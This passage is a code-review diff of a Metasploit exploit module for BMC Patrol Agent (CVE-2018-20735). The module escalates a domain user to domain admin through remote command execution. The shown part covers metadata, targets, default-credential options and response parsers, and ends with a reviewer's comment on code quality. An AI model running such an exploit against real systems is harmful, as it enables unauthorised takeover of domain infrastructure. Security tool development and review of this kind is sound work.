modules/exploits/multi/misc/bmc_patrol_cmd_exec.rb

```diff
@@ -0,0 +1,1143 @@
+        domain controller, it can be used to escalate from a normal domain user to domain
+        admin as SYSTEM on a DC is DA. **WARNING** The windows version of this exploit uses
+        powershell to execute the payload. The powershell version tends to timeout on
+        the first run so it may take multiple tries.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b0yd', # @rwincey / Vulnerability Discovery and MSF module author
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-20735'],
+          ['URL', 'https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/']
+        ],
+      'Platform'       => ['win','linux'],
+      'Targets'         =>
+        [
+          [
+            'Windows Powershell Injected Shellcode', {
+              'Platform' => 'win'
+            }
+          ],
+          [
+            'Generic Command Callback', {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w[linux unix win]
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'DisablePayloadHandler' => true,
+      },
+      'DisclosureDate' => 'Jan 17 2019'))
+
+      register_options([
+        Opt::RPORT(3181),
+        OptString.new('USER',   [ true,  'local or domain user to authenticate with patrol', 'patrol' ]),
+        OptString.new('PASSWORD',   [ true,  'password to authenticate with patrol', 'password' ]),
+        OptString.new('CMD',   [ false,  'command to run on the target. If this option is specified the payload will be ignored.' ])
+      ])
+
+    end
+
+  def cleanup
+    disconnect
+    print_status("Disconnected from BMC Patrol Agent.")
+    @inflater.close
+    @deflater.close
+    super
+  end
+
+  def get_target_os( srv_info_msg )
+    lines = srv_info_msg.split("\n")
+    fail_with(Failure::UnexpectedReply, "Invalid server info msg.") if lines[0] != "MS" and lines[1] != "{" and lines[-1] != "}"
+
+    os = $nil
+    ver = $nil
+    lines[2..-2].each do |i|
+      val = i.split("=")
+      if val.length == 2
+        if val[0].strip! == "T"
+          os = val[1]
+        elsif val[0].strip! == "VER"
+          ver = val[1]
+        end
+      end
+    end
+    [os,ver]
+  end
+
+  def get_cmd_output( cmd_output_msg )
+
+    lines = cmd_output_msg.split("\n")
+    fail_with(Failure::UnexpectedReply, "Invalid command output msg.") if lines[0] != "PEM_MSG" and lines[1] != "{" and lines[-1] != "}"
+
+    #Parse out command results
+    idx_start = cmd_output_msg.index("Result\x00")
+    idx_end = cmd_output_msg.index("RemPsl_user")
+    output = cmd_output_msg[idx_start+7..idx_end-1]
+
+    output
+  end
+
+  def exploit
+
+    #Manually start the handler if not running a single command
+    if datastore['CMD'] == $nil or datastore['CMD'].empty?
```

Comment:
The code is here is not really useful, and does works simply by change.

Please review ruby code syntax and standards here: